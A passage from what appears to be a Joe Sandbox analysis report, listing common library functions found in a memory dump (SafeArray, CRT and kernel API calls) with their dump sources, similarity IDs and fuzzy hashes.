                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
                                                                                                          • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                          • API String ID: 3117964792-798102604
                                                                                                          • Opcode ID: 0aa50f2090d757fe0697d76d54b4a6abce6e11c401e3074690c99c4dd5d037ad
                                                                                                          • Instruction ID: 26cc19e586013ccfd0e2749d41927edad9ba61b837fe93b7da9185a40f5dc863
                                                                                                          • Opcode Fuzzy Hash: 0aa50f2090d757fe0697d76d54b4a6abce6e11c401e3074690c99c4dd5d037ad
                                                                                                          • Instruction Fuzzy Hash: 97F0247370872467CF2035B99D80B4F7BFC9F81728B008B3AF53A9B281E666E8004295
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F08E9B9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6F0B9880,00000008,6F08EAC1,00000000,00000000,?,?,6F08D7DD,6F089DEF,00000000,?,6F089BD4,6F021290,F6D10407), ref: 6F08E9CA
                                                                                                          • __lock.LIBCMT ref: 6F08E9FE
                                                                                                            • Part of subcall function 6F092438: __mtinitlocknum.LIBCMT ref: 6F09244E
                                                                                                            • Part of subcall function 6F092438: __amsg_exit.LIBCMT ref: 6F09245A
                                                                                                            • Part of subcall function 6F092438: EnterCriticalSection.KERNEL32(6F089BD4,6F089BD4,?,6F08EA03,0000000D), ref: 6F092462
                                                                                                          • InterlockedIncrement.KERNEL32(FFFFFEF5), ref: 6F08EA0B
                                                                                                          • __lock.LIBCMT ref: 6F08EA1F
                                                                                                          • ___addlocaleref.LIBCMT ref: 6F08EA3D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                          • String ID: KERNEL32.DLL
                                                                                                          • API String ID: 637971194-2576044830
                                                                                                          • Opcode ID: 958b4473bf09b7895c211aeb992ca82875b950894b4d63633816586bdaa7436e
                                                                                                          • Instruction ID: 63ec10ae23af7963606a399fc3666090afc5cb6ee84ed62a86acbdebce498148
                                                                                                          • Opcode Fuzzy Hash: 958b4473bf09b7895c211aeb992ca82875b950894b4d63633816586bdaa7436e
                                                                                                          • Instruction Fuzzy Hash: 97018C71845B00EFDB20DFA9C904749FBE0FF51329F60890ED4AA972E0DBB0A650DB11
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F03E120 Relevance: 9.4, APIs: 6, Instructions: 364COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6F03E29B
                                                                                                          • SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6F03E2B6
                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6F03E2D7
                                                                                                            • Part of subcall function 6F045760: std::tr1::_Xweak.LIBCPMT ref: 6F045769
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6F03E309
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F03E523
                                                                                                          • InterlockedCompareExchange.KERNEL32(6F0CC6A4,45524548,4B4F4F4C), ref: 6F03E544
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
                                                                                                          • String ID:
                                                                                                          • API String ID: 2722669376-0
                                                                                                          • Opcode ID: f9dda0285f26149efbf34a7c227b011a002e2db21d6cf7584ed225bd96ed54f3
                                                                                                          • Instruction ID: 3497a39b8568c4446b40d477c93fe5c278b4309dc1cd99407ebe5d8a639e821b
                                                                                                          • Opcode Fuzzy Hash: f9dda0285f26149efbf34a7c227b011a002e2db21d6cf7584ed225bd96ed54f3
                                                                                                          • Instruction Fuzzy Hash: 33D1D176E003169FDF00CFA8C994BAE77F8AF45314F148669E915AB290E775EC04CBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F048A9A Relevance: 9.1, APIs: 6, Instructions: 130COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE63
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE73
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE86
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE99
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEAC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEBF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: 36f4df71e110002901d88860ae15305ee3373dfb0fd7e03ce616c4c881f281a5
                                                                                                          • Instruction ID: 8707373cdf03a5ea1c409c58c4b06723bc426e6c78ade3c0e0e8a5f5c3401872
                                                                                                          • Opcode Fuzzy Hash: 36f4df71e110002901d88860ae15305ee3373dfb0fd7e03ce616c4c881f281a5
                                                                                                          • Instruction Fuzzy Hash: AD412974A01618DFDB00DFA9C980B9AB7FAAF89300F6085AAE519DB355DB71E841CF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F048DE8 Relevance: 9.1, APIs: 6, Instructions: 112COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE63
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE73
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE86
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE99
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEAC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEBF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: 1c37fc96a6bbff78436b7655b668e810df163990b389118eb717a24f32534d01
                                                                                                          • Instruction ID: 9036c1c5a610d65cff62708521228a257602c1a761a1910927a0e77862f4d776
                                                                                                          • Opcode Fuzzy Hash: 1c37fc96a6bbff78436b7655b668e810df163990b389118eb717a24f32534d01
                                                                                                          • Instruction Fuzzy Hash: B6414A74A00618DFDB00DF69CC80B9EB7FABF89200F6085AAE518EB255DB31E941CF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F040338 Relevance: 9.1, APIs: 6, Instructions: 112COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423B3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423C3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423D6
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423E9
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423FC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04240F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: 1c37fc96a6bbff78436b7655b668e810df163990b389118eb717a24f32534d01
                                                                                                          • Instruction ID: f16c51d6a526b17a1e153a9ae785212c999c284cc996211b67e36ea205a2f665
                                                                                                          • Opcode Fuzzy Hash: 1c37fc96a6bbff78436b7655b668e810df163990b389118eb717a24f32534d01
                                                                                                          • Instruction Fuzzy Hash: A1412A74A00618DFDB00DFA9CD80B9DBBF9AF89200F2485AAE518EB255DB71ED41CF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F048F83 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE63
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE73
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE86
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE99
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEAC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEBF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: d696beee0e5334a9fd623a9d49d1c7adaf1114efadd673d975b06f29358b3eee
                                                                                                          • Instruction ID: fc437892e72beb72cbe6b10ed7da9890bb3019e67f891cb24a5bcdf80aa31fb3
                                                                                                          • Opcode Fuzzy Hash: d696beee0e5334a9fd623a9d49d1c7adaf1114efadd673d975b06f29358b3eee
                                                                                                          • Instruction Fuzzy Hash: 06313B74E00608DFCB00DF69CC80B9EB7FAAF89200F6085A6E519E7255DB75E941CF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F048CE7 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE63
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE73
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE86
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE99
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEAC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEBF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: 10abed155de295d9daadd2849d335d225c39225bb2371187b2aee9b2c063ef89
                                                                                                          • Instruction ID: 465459ce5eced1e32ce78bc72475fc13b353902511f2bb299db83a0541650e31
                                                                                                          • Opcode Fuzzy Hash: 10abed155de295d9daadd2849d335d225c39225bb2371187b2aee9b2c063ef89
                                                                                                          • Instruction Fuzzy Hash: CC311B74E01618DFCB00DF69CD80B9EB7FAAF89200F6086A6E429E7255DB75E941CF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F048BDD Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE63
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE73
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE86
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE99
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEAC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEBF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: a6ad88cd668ecccfa8e1303d0b3af0a3b83369d3bb98b9961cf0449bdf91ccf4
                                                                                                          • Instruction ID: 3a99abe682051e4057499c1f159ecd03bafd5ed542db8c237cd1b66ed115b396
                                                                                                          • Opcode Fuzzy Hash: a6ad88cd668ecccfa8e1303d0b3af0a3b83369d3bb98b9961cf0449bdf91ccf4
                                                                                                          • Instruction Fuzzy Hash: CE314874E00608DFCB00DF69CC80B9EB7FAAF89200F6085AAE429E7255CB75E941CF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F040668 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423B3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423C3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423D6
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423E9
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423FC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04240F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: ad769ec9be3bbced46f9fa734889f22adf0cbd1cc13f93e0103c02431a6c38b4
                                                                                                          • Instruction ID: 6975ca73ef70c49f61862a2c141ef595ac4feb5687e0caa6434d51157f04be00
                                                                                                          • Opcode Fuzzy Hash: ad769ec9be3bbced46f9fa734889f22adf0cbd1cc13f93e0103c02431a6c38b4
                                                                                                          • Instruction Fuzzy Hash: DB310A74A00618DFDB00DF69C980B9DB7F9AF89200F2085AAE519E7251DB75E941CF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0405DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423B3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423C3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423D6
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423E9
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423FC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04240F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: e96e2eca0e2d7ca0be7b944a99aa381f59e2c3f7c0902e9ffcc814601cdfcdea
                                                                                                          • Instruction ID: 0879d9c4950dc22a77907f2c54c21f29b6f4b97a7a1fedcd8ec76c1b37aea112
                                                                                                          • Opcode Fuzzy Hash: e96e2eca0e2d7ca0be7b944a99aa381f59e2c3f7c0902e9ffcc814601cdfcdea
                                                                                                          • Instruction Fuzzy Hash: C7310874A00618DFDB00DF69C980B9EB7F9AF89200F2085AAE519EB251DB75ED41CF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0404D3 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
